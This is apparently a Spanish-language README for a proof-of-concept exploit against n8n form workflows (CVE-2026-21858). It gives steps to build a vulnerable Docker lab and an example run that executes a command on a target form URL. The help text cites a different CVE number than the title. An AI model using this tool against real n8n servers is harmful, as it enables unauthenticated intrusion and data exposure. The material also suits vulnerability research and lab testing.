
Prueba de concepto del exploit para CVE-2026-21858 (ni8mare) que afecta a las versiones de n8n < 1.121.0
n8n es una plataforma de automatización de flujos de trabajo de código abierto. Las versiones desde la 1.65.0 hasta la 1.121.0 permiten a un atacante acceder a archivos en el servidor subyacente mediante la ejecución de ciertos flujos de trabajo basados en formularios. Un flujo de trabajo vulnerable podría otorgar acceso a un atacante remoto no autenticado, lo que resultaría en la exposición de información sensible almacenada en el sistema y podría permitir un mayor compromiso dependiendo de la configuración de implementación y el uso del flujo de trabajo. Este problema se corrige en la versión 1.121.0.
https://nvd.nist.gov/vuln/detail/CVE-2026-21858
❯ python CVE-2026-21858.py -h
usage: CVE-2026-21858.py [-h] --command COMMAND form
PoC exploit: CVE-2026-1357
positional arguments:
form Target form URL
options:
-h, --help show this help message and exit
--command COMMAND Command to run on target
Este PoC fue escrito contra un flujo de trabajo n8n básico para simular un flujo simple de conversión de archivos:

Clona el repositorio y crea una instancia vulnerable de docker:
mkdir n8n-data
sudo chown -R 1000:1000 n8n-data
docker-compose up -d
Una vez creada la instancia, crea el flujo de trabajo que se muestra en la captura de pantalla anterior. Para el paso Extract from File, deberás configurar la opción On Error en Contine para permitir que el flujo de trabajo se complete. Además, establece el flujo en Active en la barra de herramientas.
Después de crear el flujo, instala los requisitos y ejecuta el exploit:
pip install -r requirements.txt
python CVE-2026-21858.py http://localhost:5678/form/1d6de4f6-23dc-4163-ad39-a69252189d5e --command "uname -a"

Este proyecto se proporciona únicamente con fines educativos y de investigación. El autor no es responsable del mal uso o los daños causados por este código.